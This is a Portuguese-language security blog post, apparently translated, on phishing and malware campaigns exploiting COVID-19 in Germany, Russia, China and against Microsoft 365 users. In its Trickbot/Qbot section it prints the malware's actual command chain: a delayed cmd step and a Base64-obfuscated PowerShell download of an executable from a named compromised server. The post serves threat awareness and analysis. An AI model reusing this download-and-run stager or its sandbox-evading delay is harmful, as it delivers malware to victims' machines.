Os invasores continuam a explorar o tema COVID-19, criando cada vez mais ameaças para usuários interessados em tudo relacionado à epidemia. Em um post anterior, já conversamos sobre que tipos de malware apareceram após o coronavírus, e hoje falaremos sobre técnicas de engenharia social que usuários de diferentes países já encontraram, inclusive na Rússia. Tendências gerais e exemplos - sob o corte.
Lembra da última vez que falamos sobre como as pessoas leem prontamente não apenas sobre o coronavírus e o curso da epidemia, mas também sobre medidas de apoio financeiro? Aqui está um bom exemplo. No estado alemão da Renânia do Norte-Vestfália, il NRW, um curioso ataque de phishing foi descoberto. Os atacantes criaram cópias do site do Ministério da Economia ( NRW Ministry of Economic Affairs), onde qualquer pessoa pode fazer um pedido de assistência financeira. Esse programa realmente existe e acabou por estar nas mãos dos golpistas. Tendo recebido os dados pessoais de suas vítimas, eles fizeram uma solicitação já no site do Ministério, mas indicaram outros detalhes bancários. Segundo dados oficiais, 4 mil pedidos falsos foram feitos até a divulgação do esquema. Como resultado, 109 milhões de dólares destinados aos cidadãos afetados caíram nas mãos de fraudadores.
Você quer um teste gratuito para COVID-19?
Outro exemplo revelador de phishing de coronavírus foi encontrado em e-mails. As mensagens atraíram a atenção dos usuários com a proposta de realizar testes gratuitos para infecção por coronavírus. No anexo dessas cartas havia instâncias do Trickbot / Qakbot / Qbot. E quando aqueles que queriam verificar sua saúde começaram a "preencher o formulário em anexo", um script malicioso foi baixado no computador. E, para evitar a verificação pelo método sandboxing, o script começou a carregar o vírus principal somente após algum tempo, quando os sistemas de segurança estavam convencidos de que nenhuma atividade maliciosa estava ocorrendo.Convencer a maioria dos usuários a ativar macros também foi fácil. Para fazer isso, foi utilizado um truque padrão. Ao preencher o questionário, primeiro é necessário ativar as macros, o que significa que você executa o script VBA.
Como você pode ver, o script VBA é especialmente mascarado de antivírus.
O Windows tem uma função de espera quando o aplicativo aguarda / T <segundos> antes de aceitar a resposta "Sim" por padrão. No nosso caso, o script aguardou 65 segundos antes de excluir arquivos temporários: e no processo de espera, o malware foi baixado. Para fazer isso, um script especial do PowerShell foi lançado:cmd.exe /C choice /C Y /N /D Y /T 65 & Del C:\Users\Public\tmpdir\tmps1.bat & del C:\Users\Public\1.txt
cmd /C powershell -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]: :FromBase64String('aHR0cDovL2F1dG9tYXRpc2NoZXItc3RhdWJzYXVnZXIuY29tL2ZlYXR1cmUvNzc3Nzc3LnBuZw==')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcUHVibGljXHRtcGRpclxmaWxl')) + '1' + '.e' + 'x' + 'e') >C:\Users\Public\1.txt
Após decodificar o valor Base64, o script do PowerShell carrega o backdoor localizado no servidor da Web anteriormente hackeado da Alemanha:http://automatischer-staubsauger.com/feature/777777.png
e salva sob o nome:C:\Users\Public\tmpdir\file1.exe
A pasta ‘C:\Users\Public\tmpdir’é excluída quando o arquivo 'tmps1.bat' é executado, que contém o comandocmd /c mkdir ""C:\Users\Public\tmpdir"".Ataque direcionado a agências governamentais
Além disso, os analistas da FireEye relataram recentemente um ataque do APT32 direcionado às estruturas do governo de Wuhan, bem como ao Ministério de Gerenciamento de Emergências da China. Um dos RTFs distribuídos continha um link para um artigo do New York Times intitulado Coronavirus Live Updates: a China está rastreando viajantes de Hubei . No entanto, ao lê-lo, ocorreu o download de malware (os analistas da FireEye identificaram a instância como METALJACK).Curiosamente, no momento da detecção, nenhum dos antivírus detectou essa instância de acordo com o Virustotal.
Quando sites oficiais "mentem"
O exemplo mais brilhante de um ataque de phishing aconteceu na Rússia outro dia. O motivo disso foi a nomeação do subsídio há muito esperado para crianças de 3 a 16 anos. Quando o início da aceitação de aplicativos foi anunciado em 12 de maio de 2020, milhões de pessoas correram para o site de Serviços do Estado para obter a ajuda esperada e derrubaram o portal como um ataque profissional de DDoS. Quando o presidente disse que “os serviços estatais não conseguiam lidar com o fluxo de aplicativos”, começaram a falar sobre o fato de que um site alternativo para aceitar aplicativos havia começado a funcionar.
O problema é que vários sites ganharam ao mesmo tempo e, enquanto um, o real no posobie16.gosuslugi.ru, realmente aceita aplicativos, dezenas de outros coletam dados pessoais de usuários confiáveis .Os colegas da HeartInform encontraram cerca de 30 novos domínios fraudulentos na zona .ru. Infosegurança Uma empresa da Softline acompanhou mais de 70 sites falsos de serviços públicos semelhantes desde o início de abril. Seus criadores manipulam símbolos familiares e também usam combinações das palavras gosuslugi, gosuslugi-16, vyplaty, covid-vyplaty, posobie e assim por diante.Agiotagem e Engenharia Social
Todos esses exemplos confirmam apenas que os invasores monetizam com sucesso o tema do coronavírus. E quanto maior a tensão social e as perguntas mais incertas, maior a chance dos fraudadores roubarem dados importantes, forçarem as pessoas a doarem seu dinheiro por conta própria ou simplesmente invadirem mais computadores.E, como a pandemia fez com que pessoas potencialmente despreparadas trabalhassem em casa em grandes números, não apenas os dados pessoais, mas também os corporativos estão em risco. Por exemplo, os usuários recentes do Microsoft 365 (anteriormente Office 365) também foram submetidos a um ataque de phishing. As pessoas massivamente receberam mensagens de voz "perdidas" nos anexos das cartas. No entanto, de fato, os arquivos eram uma página HTML que enviava as vítimas do ataque à página de login falsa do Microsoft 365. Como resultado - perda de acesso e comprometimento de todos os dados da conta.